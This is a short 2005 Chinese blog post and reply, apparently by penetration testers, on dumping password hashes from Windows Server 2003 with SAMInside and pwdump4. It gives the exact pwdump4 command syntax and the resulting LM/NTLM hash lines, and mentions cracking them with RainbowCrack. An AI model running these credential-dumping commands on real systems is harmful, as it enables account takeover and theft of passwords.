Dump Hash From Windows 2003(圖)
獲取windows密碼hash的兩個(gè)方式post by baozi @ 28 九月, 2005 09:47 在給客戶做滲透測(cè)試的時(shí)候,遇到一個(gè)win2k3機(jī)器,pwdump4讀不出密碼bash,lc5裝上去一讀的話LC5就掛掉,突然想到saminside這個(gè)東西,似乎記得他有兩個(gè)讀本地密碼散列的方式的,一個(gè)是一般的通過(guò)LSASS讀,還有一個(gè)就是通過(guò)shedule服務(wù)來(lái)讀,還沒(méi)去搜索后者什么原理,拿上去一試果然行,另存為pwdump文件回來(lái)用ranbowcrack跑,哈哈
國(guó)內(nèi)似乎還沒(méi)有利用shedule服務(wù)讀密碼的cmd程序吧,哪個(gè)大蝦弄一個(gè)就好了,畢竟saminside圖形的不方便。
其實(shí)以前我也遇到過(guò)讀不出來(lái)密碼hash的 w2k3 的機(jī)器,只不過(guò)你參數(shù)用錯(cuò)了 hieei
pwdump4 ip /o:fuckbaozi /u:administrator
用這種格式一般來(lái)說(shuō)可以dump出hash來(lái) ip 換成 127.0.0.1 :D
如果你用 /l 參數(shù), 大部分是dump不出來(lái)的,即使dump出來(lái),hash也是不全的.
C:/>pwdump4 127.0.0.1 /o:fuckbaozi /u:administrator
PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.by bingle@email.com.cnThis program is free software based on pwpump3 by Phil Staubsunder the GNU General Public License Version 2.
Please enter the password >*******local path of //127.0.0.1/ADMIN$ is: C:/WINDOWSconnect to 127.0.0.1 for result, plz wait...SRV>Version: OS Ver 5.2, Service Pack 1, ServerTerminalLSA>Samr Enumerate 4 Users In Domain DREAM.All Completed.
C:/>type fuckbaoziAdministrator:500:A02F5A52E33540C0AAD3B435B514042E:00F0E9AB3FE77043C228DDB70E5C41A6:::Guest:501:AAD3B445B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::kaka:1004:9FFBED36199C0D0723WD3B83FA6627C7:E4CCAB020C323DC2411876AE032CD5FF:::SUPPORT_388945a0:1001:AAD3B435B51404EEAAD3B435B51404EE:3279F1AC07C5E7C197752437531BB8B3:::
C:/>pwdump4 /l /o:fuckbaozi /u:administrator
PWDUMP4.02 dump winnt/2000 user/password hash remote or local for crack.by bingle@email.com.cnThis program is free software based on pwpump3 by Phil Staubsunder the GNU General Public License Version 2.
SRV>Version: OS Ver 5.2, Service Pack 1, ServerTerminal
C:/>type fuckbaoziAdministrator:500:A02F5322E10540A0AA33B435B51404EE:00F0E9433FE62378C228D4370E5C41A6:::Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
C:/>
如此而已,用pwdump4 ip /o:file /u:user的方式,我還沒(méi)有發(fā)現(xiàn)有不能dump出密碼hash的2003系統(tǒng).
網(wǎng)公網(wǎng)安備